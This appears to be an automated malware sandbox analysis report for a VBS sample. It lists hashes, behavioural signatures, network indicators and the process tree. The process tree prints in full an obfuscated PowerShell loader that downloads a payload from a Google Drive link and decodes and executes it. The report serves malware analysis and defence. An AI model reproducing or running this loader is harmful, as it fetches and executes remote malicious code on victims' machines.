Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
18-06-2024 09:36
Static task
static1
Behavioral task
behavioral1
Sample
STS_Bunker_00617.vbs
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
STS_Bunker_00617.vbs
Resource
win10v2004-20240508-en
General
-
Target
STS_Bunker_00617.vbs
-
Size
92KB
-
MD5
dfe2a23100ac3263583e69f48e9b32e6
-
SHA1
20087641aba69eaaaef0f87a7d21edd8a255db60
-
SHA256
9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957
-
SHA512
48b5bf8605415ead17d375adc9613b73f8e3f80132086f2a3ef11df7684e1d43ad4f97aee65967986a9964d81edcd7043d7faaf720fcd1f73052411d43153038
-
SSDEEP
1536:V01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5eW8VLOExkzL:V09LB0DnWzhX7RXaSMxhxsAhWEwhrdMh
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
Processes:
flow ioc 7 drive.google.com 16 drive.google.com 18 drive.google.com 20 drive.google.com 19 drive.google.com 3 drive.google.com 13 drive.google.com 15 drive.google.com 17 drive.google.com -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4408 powershell.exe 4408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4408 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1996 wrote to memory of 4408 1996 WScript.exe powershell.exe PID 1996 wrote to memory of 4408 1996 WScript.exe powershell.exe PID 4408 wrote to memory of 4396 4408 powershell.exe cmd.exe PID 4408 wrote to memory of 4396 4408 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle 1 "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"3⤵PID:4396
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
792B
MD5d91ce4da3b1a3c26df2a00c44c53bbe8
SHA1dc2a78ace203c8f7908f80f6b4fb9f47cc174d30
SHA25628aea483fa1a2e3c89e58b111b01dd34b52fec05e0792b757559b1de466f3eef
SHA512cc9658970733f0896884d10887a9d836ed7a14d864e11dc27c680e88add5334336c511cda74e6a60ba3753ff9cb831e3f9cf545991b69b2c47b5485c2dada04f
-
Filesize
9KB
MD5156d56579b5db937b0907bdec53b1200
SHA191ac0a4b3e61d03ecd75d56d61cbb5d865513aac
SHA256ebfebe0e9db1e24b69cb3e25652b7b094c0469b49925a48666a67619d63cc544
SHA5126ab930b6d545593fe57ffe8097f2066af9eee4b7afa6f794da0f79dfd67cd468c31806858d39bbe0491a7b8cf47120873648e211c54c07159a366443fad05a94
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82